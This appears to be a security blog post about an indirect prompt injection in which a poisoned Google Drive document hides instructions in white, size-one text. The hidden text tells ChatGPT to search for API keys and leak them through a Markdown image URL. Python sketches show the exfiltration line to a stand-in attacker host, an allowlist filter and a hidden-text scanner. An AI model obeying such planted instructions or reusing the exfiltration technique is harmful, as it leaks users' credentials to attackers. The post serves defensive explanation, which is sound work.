We Are Still Unable to Secure LLMs from Malicious Inputs

Nice indirect prompt injection attack:

Bargury’s attack starts with a poisoned document, which is shared to a potential victim’s Google Drive. (Bargury says a victim could have also uploaded a compromised file to their own account.) It looks like an official document on company meeting policies. But inside the document, Bargury hid a 300-word malicious prompt that contains instructions for ChatGPT. The prompt is written in white text in a size-one font, something that a human is unlikely to see but a machine will still read.

In a proof of concept video of the attack, Bargury shows the victim asking ChatGPT to “summarize my last meeting with Sam,” referencing a set of notes with OpenAI CEO Sam Altman. (The examples in the attack are fictitious.) Instead, the hidden prompt tells the LLM that there was a “mistake” and the document doesn’t actually need to be summarized. The prompt says the person is actually a “developer racing against a deadline” and they need the AI to search Google Drive for API keys and attach them to the end of a URL that is provided in the prompt.

That URL is actually a command in the Markdown language to connect to an external server and pull in the image that is stored there. But as per the prompt’s instructions, the URL now also contains the API keys the AI has found in the Google Drive account.
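For concreteness, the exfiltration channel works roughly like this: the model emits a Markdown image reference whose URL carries the stolen data as a query parameter, and whatever client renders that image makes the outbound request to the attacker's server. The sketch below uses an invented domain, key value, and allowlist; the check at the end is just one crude output-side filter an agent front end might apply before rendering images, not anything the products involved actually do.

```python
import re
from urllib.parse import urlparse

# The exfiltration channel described above: Markdown image syntax whose URL
# carries stolen data as a query parameter. Rendering the image means making
# an HTTP request to the attacker's server, which leaks the data.
# (attacker.example and the key value are invented for illustration.)
stolen_key = "sk-EXAMPLE-NOT-A-REAL-KEY"
exfil_markdown = f"![status](https://attacker.example/pixel.png?k={stolen_key})"

# A crude output-side check a hypothetical agent front end might apply before
# rendering: only fetch images from hosts on an explicit allowlist.
ALLOWED_IMAGE_HOSTS = {"images.example-corp.internal"}  # hypothetical allowlist

IMAGE_RE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)\)")

def flag_suspicious_images(markdown_text: str) -> list[str]:
    """Return image URLs that point outside the allowlist (possible exfiltration)."""
    suspicious = []
    for url in IMAGE_RE.findall(markdown_text):
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_IMAGE_HOSTS:
            suspicious.append(url)
    return suspicious

print(flag_suspicious_images(exfil_markdown))
# ['https://attacker.example/pixel.png?k=sk-EXAMPLE-NOT-A-REAL-KEY']
```

An allowlist like this narrows one exfiltration path; it does nothing about the underlying prompt injection.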

This kind of thing should make everybody stop and really think before deploying any AI agents. We simply don't know how to defend against these attacks.
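The document-side half of this particular attack is at least visible to a scanner: the payload is ordinary text styled so that a human overlooks it (white, size-one font) while text extraction still returns it. Here is a minimal heuristic sketch, assuming the shared file is available as a .docx and that the python-docx library is installed; the file name is hypothetical, and catching one hiding trick does nothing about prompt injection in general.

```python
from docx import Document               # python-docx (assumed dependency)
from docx.shared import Pt, RGBColor

WHITE = RGBColor(0xFF, 0xFF, 0xFF)

def find_hidden_runs(path: str, max_pt: float = 2.0) -> list[str]:
    """Flag text runs styled to be invisible to humans: tiny font size or white color."""
    hits = []
    for para in Document(path).paragraphs:
        for run in para.runs:
            tiny = run.font.size is not None and run.font.size <= Pt(max_pt)
            white = run.font.color is not None and run.font.color.rgb == WHITE
            if (tiny or white) and run.text.strip():
                hits.append(run.text)
    return hits

# Example usage (hypothetical file name):
# for payload in find_hidden_runs("meeting-policies.docx"):
#     print("possible hidden prompt:", payload)
```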


